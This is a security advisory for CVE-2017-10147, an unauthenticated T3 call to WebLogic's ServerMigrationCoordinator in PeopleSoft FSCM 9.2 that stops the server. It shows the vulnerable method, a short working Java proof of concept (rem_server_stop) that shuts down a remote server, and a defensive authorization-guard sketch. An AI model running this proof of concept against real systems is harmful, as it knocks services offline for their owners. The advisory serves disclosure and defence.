Application: Oracle PeopleSoft
Versions Affected: PeopleSoft FSCM 9.2
Vendor: Oracle
Bug: Missing Authentication for Critical Function
Reported: 16.03.2017
Vendor response: 17.03.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Vahagn Vardanyan (ERPScan)
Class: Missing Authentication
Risk: High
Impact: Impact on availability
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10147
CVSS Base Score v3: 8.6 / 10
CVSS Base Vector:

| Metric | Value |
|---|---|
| AV: Attack Vector (Related exploit range) | Network (N) |
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed (C) |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | None (N) |
| A: Impact to Availability | High (H) |

An attacker can send a special T3 request to stop the remote server.
Vulnerable packages: PeopleSoft FSCM 9.2
To correct this vulnerability, install Oracle CPU July 2017.
The vulnerability is present in the migrate functionality of the `weblogic/cluster/singleton/ServerMigrationCoordinator` class.
When the migrate function is called over the T3 protocol, the PeopleSoft server is stopped without authorization.

```java
@Override
public void migrate(final String serverName, final String sourceMachine, final String destinationMachine, final boolean sourceDown, final boolean destinationDown) throws ServerMigrationException {
    // Look up any migration already running for this server name
    ServerMigrationTask task = this.taskMap.get(serverName);
    if (task == null) {
        task = new ServerMigrationTask(serverName, destinationMachine);
        if (MigrationDebugLogger.isDebugEnabled()) {
            MigrationDebugLogger.debug(serverName + " New Migration Task " + task);
        }
        this.taskMap.put(serverName, task);
        try {
            // No authentication or authorization check precedes the stop:
            // the caller's identity is never examined in this method
            this.stopServer(sourceDown, task);
            this.startServer(destinationDown, task);
        }
        finally {
            this.taskMap.remove(serverName);
        }
        return;
    }
    throw new ServerMigrationException("Migration operation in progress", null);
}
```

```java
static boolean rem_server_stop(String PS_SERVER_IP, Server PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException {
    Properties p = new Properties();
    p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
    p.put(Context.PROVIDER_URL, "t3://"+PS_SERVER_IP+":"+PS_SERVER_PORT);
    Context ctx = new InitialContext(p);
    Object obj = ctx.lookup("weblogic/cluster/singleton/ServerMigrationCoordinator");
    Object o = PortableRemoteObject.narrow(obj, ServerMigrationCoordinator.class);
    ServerMigrationCoordinator h = (ServerMigrationCoordinator) o;
    h.migrate("PIA","а","any_data_or_ip", true, true);
    return false;
}
```
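
The missing check in the `migrate` method shown above, sketched as a guard that runs before any state-changing call. This is an added illustration, not Oracle's patch and not WebLogic code. The `Caller` type, the `Admin` role name and the simplified `stopServer`/`startServer` bodies are assumptions made for the example.

```java
import java.util.Collections;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

// Simplified stand-in for the coordinator; all names here are hypothetical.
public class GuardedMigrationDemo {
    // Hypothetical caller identity; a real server would derive it from the authenticated session.
    static final class Caller {
        final String name;
        final Set<String> roles;
        Caller(String name, Set<String> roles) { this.name = name; this.roles = roles; }
    }

    private final Map<String, String> taskMap = new ConcurrentHashMap<>();
    boolean running = true;

    // Deny by default: the authorization check runs before any state is touched,
    // so an unauthenticated remote call never reaches stopServer().
    void migrate(Caller caller, String serverName, String destinationMachine) {
        if (caller == null || !caller.roles.contains("Admin")) {
            throw new SecurityException("migrate denied for "
                    + (caller == null ? "<anonymous>" : caller.name));
        }
        // Claim the task slot atomically; a second concurrent request is rejected.
        if (taskMap.putIfAbsent(serverName, destinationMachine) != null) {
            throw new IllegalStateException("Migration operation in progress");
        }
        try {
            stopServer();
            startServer();
        } finally {
            taskMap.remove(serverName);
        }
    }

    void stopServer()  { running = false; }
    void startServer() { running = true; }

    public static void main(String[] args) {
        GuardedMigrationDemo c = new GuardedMigrationDemo();
        try {
            c.migrate(null, "PIA", "host-b");   // anonymous caller, constructed input
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage() + ", running=" + c.running);
        }
        Caller admin = new Caller("ops", Collections.singleton("Admin"));
        c.migrate(admin, "PIA", "host-b");      // authorized caller is allowed through
        System.out.println("authorized migrate completed, running=" + c.running);
    }
}
```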